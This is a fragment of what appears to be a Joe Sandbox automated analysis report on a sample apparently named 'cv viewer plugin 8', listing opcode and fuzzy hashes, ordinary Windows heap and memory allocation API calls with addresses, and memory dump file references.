                                                    • Instruction ID: fe8d7d38eee6a8e2931f695a4198af8e1df079343418bdf1b33d599da452ba6d
                                                    • Opcode Fuzzy Hash: a86e586801ac815cb564332ef4b73298eb257ae09f69d65b2ea21bcadf170d0b
                                                    • Instruction Fuzzy Hash: 59E09A31A0010A9BC704EF98CD45BBCBB71EF20700F0041AD990607780CB396946CA89
                                                    APIs
                                                    • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404A98
                                                    • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404ACC
                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AE6
                                                    • HeapFree.KERNEL32(00000000,?,?,00000000,00404838,?,?,?,00000100,?,00000000), ref: 00404AFD
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AllocHeap$FreeVirtual
                                                    • String ID:
                                                    • API String ID: 3499195154-0
                                                    • Opcode ID: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                    • Instruction ID: e2b6aa67baf941fda6b0a0502f281f3949fe5c10b928d307e266fea8edbc1969
                                                    • Opcode Fuzzy Hash: 326bc21520183113991a8339bf2de7ac4146e2f373772080d0e11da3f1adebb6
                                                    • Instruction Fuzzy Hash: 1E1113B0201601EFC7208F19EE85E227BB5FB857217114A3AF692E65F1D770A845CB4C